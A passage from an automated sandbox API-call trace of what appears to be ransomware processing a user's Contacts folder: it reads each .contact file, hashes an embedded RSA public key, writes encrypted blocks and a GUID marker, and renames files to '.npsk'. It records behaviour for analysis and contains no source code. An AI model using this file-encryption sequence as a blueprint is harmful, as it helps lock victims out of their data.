lpMem=0x84f3d8 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87150 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x327a588 | out: hHeap=0x750000) returned 1 [0212.804] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.805] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.805] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0212.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0212.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x428) returned 0x32ef680 [0212.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x32ef680, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0212.805] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x430) returned 0x3a8af88 [0212.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef680 | out: hHeap=0x750000) returned 1 [0212.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d598 | out: hHeap=0x750000) returned 1 [0212.805] WriteFile (in: hFile=0x61c, lpBuffer=0x3a8af88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3a8af88*, lpNumberOfBytesWritten=0x397fb50*=0x28, lpOverlapped=0x0) returned 1 [0212.805] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.805] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0212.805] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0212.805] CloseHandle (hObject=0x61c) returned 1 [0212.811] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b20a0 [0212.811] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x890) returned 0x3a8af88 [0212.811] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b20a0 | out: hHeap=0x750000) returned 1 [0212.811] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.npsk")) returned 1 [0212.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.812] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.812] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0212.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0212.814] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0212.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241248 [0212.814] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b1d70 [0212.814] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0212.814] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0212.814] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0212.816] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1177) returned 1 [0212.816] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0212.819] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.819] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0212.854] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.854] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.854] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.855] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x499, lpOverlapped=0x0) returned 1 [0212.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.855] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x1f6) returned 0x7a79b8 [0212.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0212.855] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b20a0) returned 1 [0212.856] CryptCreateHash (in: hProv=0x7b20a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0212.856] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0212.856] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0212.856] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x11) returned 0x32728a8 [0212.856] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0212.856] GetLastError () returned 0x0 [0212.856] SetLastError (dwErrCode=0x0) [0212.856] GetLastError () returned 0x0 [0212.856] SetLastError (dwErrCode=0x0) [0212.856] GetLastError () returned 0x0 [0212.856] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.857] SetLastError (dwErrCode=0x0) [0212.857] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.858] GetLastError () returned 0x0 [0212.858] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] GetLastError () returned 0x0 [0212.859] SetLastError (dwErrCode=0x0) [0212.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728a8 | out: hHeap=0x750000) returned 1 [0212.859] CryptDestroyHash (hHash=0x3277d68) returned 1 [0212.859] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0212.859] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0212.859] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0212.859] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0212.859] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.860] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0212.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4a0) returned 0x32ef680 [0212.860] SetFilePointer (in: hFile=0x61c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0212.860] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x32efb28 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x328bd38 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a5e8 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32535d0 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870d8 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253618 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870f0 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870a8 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87168 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a871c8 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x3279af8 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x158) returned 0x3225448 [0212.860] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3225448, Size=0x218) returned 0x3a8af88 [0212.860] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x558) returned 0x3a8b1a8 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a871c8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87168 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3279af8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8b1a8 | out: hHeap=0x750000) returned 1 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87168 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f388 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x3a871c8 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x32728c8 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x9) returned 0x3a870a8 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f378 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10e) returned 0x3217e98 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286288 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a588 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728a8 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x104) returned 0x3a86078 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728e8 [0212.861] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f398 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a871c8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f378 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32728c8 | out: hHeap=0x750000) returned 1 [0212.861] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f388 | out: hHeap=0x750000) returned 1 [0212.862] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87168 | out: hHeap=0x750000) returned 1 [0212.862] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0212.862] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x327a5e8 | out: hHeap=0x750000) returned 1 [0212.862] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.862] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x499, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.862] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0212.862] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0212.863] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d598 [0212.863] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x428) returned 0x32ef680 [0212.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x32ef680, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0212.863] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x430) returned 0x3a8af88 [0212.863] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32ef680 | out: hHeap=0x750000) returned 1 [0212.863] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x82d598 | out: hHeap=0x750000) returned 1 [0212.863] WriteFile (in: hFile=0x61c, lpBuffer=0x3a8af88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3a8af88*, lpNumberOfBytesWritten=0x397fb50*=0x28, lpOverlapped=0x0) returned 1 [0212.863] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.863] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0212.863] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0212.863] CloseHandle (hObject=0x61c) returned 1 [0212.871] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b20a0 [0212.871] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x890) returned 0x3a8af88 [0212.871] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b20a0 | out: hHeap=0x750000) returned 1 [0212.871] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.npsk")) returned 1 [0212.872] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a8af88 | out: hHeap=0x750000) returned 1 [0212.872] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.872] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0212.874] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b1d70 | out: hHeap=0x750000) returned 1 [0212.874] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0212.874] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241248 [0212.874] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x76) returned 0x7bce58 [0212.874] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0212.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned=".ini" [0212.874] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0212.874] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0212.874] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x50) returned 0x3241248 [0212.874] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b1d70 [0212.874] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3241248 | out: hHeap=0x750000) returned 1 [0212.874] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned=".contact" [0212.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0212.883] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=1174) returned 1 [0212.884] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0212.886] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x470, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.886] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0212.926] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0212.926] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0212.926] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.926] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x496, lpOverlapped=0x0) returned 1 [0212.926] lstrlenA (lpString="-----BEGIN PUBLIC 